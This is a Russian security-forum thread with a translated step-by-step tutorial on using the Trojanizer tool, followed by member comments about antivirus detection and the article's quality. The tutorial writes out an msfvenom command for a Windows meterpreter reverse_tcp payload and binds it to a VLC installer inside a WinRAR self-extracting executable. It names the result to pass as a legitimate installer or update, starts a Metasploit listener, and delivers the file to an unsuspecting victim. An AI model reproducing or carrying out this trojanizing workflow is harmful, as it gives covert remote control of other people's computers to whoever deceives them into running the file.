Статья Джоиним зловред и легитимный файл между собой

Здарова бандиты и прочая кибернечисть. С новым подгончиком.
Первоисточник:
Перевод:
Перевод выполнен от команды Codeby
Примечание от команды форума:
  • Статья является переводом.
  • Статья исключительно в ознакомительных целях.
Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).

Откуда скачать?

git clone https://github.com/r00t-3xp10it/trojanizer.git

1571250788426.png


Далее создаем пейлоад, используя msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

1571250825094.png


Запуск Trojanizer

Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.

1571250870861.png


1571250884835.png


После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.

1571250921217.png


После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize

1571250954324.png


Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.

1571250980344.png


После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.

1571250994237.png


Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.

1571251059898.png


Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
Примечание: Trojanizer действует с WINRAR и вследствие этого иконка не связывается с архивными файлами. Вместо этого показывается иконка WinRAR.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.

1571251101347.png


А теперь давайте поднимем Listener в Metasploit:
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j
1571251145315.png


Отправляем вредоносную программу на машину жертвы любым удобным способом.

Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.

1571251180481.png


После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.

1571251191184.png


Но в тоже время, у нас будет meterpreter сессия, как показано ниже.

1571251201983.png


Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
 
Последнее редактирование:

gushmazuko

Green Team
24.03.2017
173
451
BIT
1
Как на счет детекта? AV не ругается на склейку, если сам payload не палимый?
 

WhiteHacK

Green Team
18.08.2019
42
9
BIT
0
А в чем собственно концептуальная разница между ручной сборкой SFX и этой через скрипт, кроме удобства разве что есть ли еще какие нибудь преимущества?
 
  • Нравится
Реакции: leonardocs

Tony

Green Team
21.09.2019
87
14
BIT
0
В чём способ обхода av? Любой уважающий себя av красный флаг ставит, по умолчанию на sfx архив, я уж не говорю о пост распаковке. Сейчас бы в 2K19 статьи писать о поделках школьников с гитхаба и говорить о пороге входа на форум.
 

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
В чём способ обхода av? Любой уважающий себя av красный флаг ставит, по умолчанию на sfx архив, я уж не говорю о пост распаковке. Сейчас бы в 2K19 статьи писать о поделках школьников с гитхаба и говорить о пороге входа на форум.
Что? Где написано хоть слово про способ обхода AV?!
В остальном вопросы задавайте самому автору. Мы лишь перевели.
А в чем собственно концептуальная разница между ручной сборкой SFX и этой через скрипт, кроме удобства разве что есть ли еще какие нибудь преимущества?
Разве что шеллкод полиглот генерирурет.

Как на счет детекта? AV не ругается на склейку, если сам payload не палимый?
Да вроде не детектится. Только я не пробовал.
 

Tony

Green Team
21.09.2019
87
14
BIT
0
Что? Где написано хоть слово про способ обхода AV?!
Жаль скрин не сделал)) Uhzpysq nh.r))
В остальном вопросы задавайте самому автору. Мы лишь перевели.
Смысл в переводе? Зачем? Ты считаешь данная техника актуальна в наше время? Или эта статья ради контента?
 

Tony

Green Team
21.09.2019
87
14
BIT
0
Извини его. Дело в том что в статье было, действительно, написано про обход ав. Но из-за досадной ошибки и невнимательности.
Я уже понял. Вопрос был не конкретно к ТС, а к codeby вобщем. Создам тему с хотелками.
 
  • Нравится
Реакции: mrOkey

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
 
  • Нравится
Реакции: gushmazuko

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
Я уже понял. Вопрос был не конкретно к ТС, а к codeby вобщем. Создам тему с хотелками.
Всё верно. Я скопировал старый шаблони забыл удалить старое предложение про "Bypass AV" на что мне указали модераторы после публикации моего предыдущего ответа. Приношу свои извинения. А так же будет очень здорово, если ты сам накидаешь ссылок на интересные топики, которые было бы интересно перевести.
 
Последнее редактирование:

Сергей Попов

Кодебай
30.12.2015
4 727
6 723
BIT
444
Создам тему с хотелками
Вопрос был не конкретно к ТС, а к codeby вобщем
Нет, ошиблись со ссылкой для переводчицы. Просто контент ради контента нам не нужен.
 
  • Нравится
Реакции: Tony и gushmazuko

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
 
Последнее редактирование:
  • Нравится
Реакции: Lisenok и Air7771

SearcherSlava

Red Team
10.06.2017
943
1 262
BIT
224
согласен)))
все что лежит на гитхабе в общ. доступе это уже палится!

Здрав будь! Что в Гугл попало - то пропало. Создатели сайта называют GitHub «социальной сетью для разработчиков». Кроме размещения кода, участники могут общаться, комментировать правки друг друга, а также следить за новостями знакомых = сверхмногомерный массив данных для анализа психологии поведения пользователей и выявления их пожеланий и предпочтений. Всё по чесноку.
Всё по чесноку.jpg
 
Последнее редактирование:

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
Это не моя статья. Будь внимателен, первоисточник указан. Я лишь выложил перевод, который делал тоже не я
 

Lisenok

Green Team
02.04.2016
133
75
BIT
1
кибер-нечисть тебя в серьезно даже не восприняла...)) наивный)))))) как всегда, улыбнул..
напиши что нить нормальное и не позорься у тя имя нароботанное , че ты всякую х-ю людям впарива-шь?! я знаю ты можешь! напиши хоть в привате))
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
P.S. даже если она , тем более, лишь перевод и перевод выполнен не этим участником форума.
 

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
Поддерживаю Ваше высказывание насчет этого, очень неожиданная статья для администратора форума кодеби.
P.S. даже если она , тем более, лишь перевод и перевод выполнен не этим участником форума.
А от меня рекомендую почитать мою последнюю статью: Misconfiguration в сервисах разработки
 
  • Нравится
Реакции: Lisenok

atum

Green Team
06.02.2019
13
20
BIT
0
А еще, если по школьному, можно использовать iexpress.exe.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!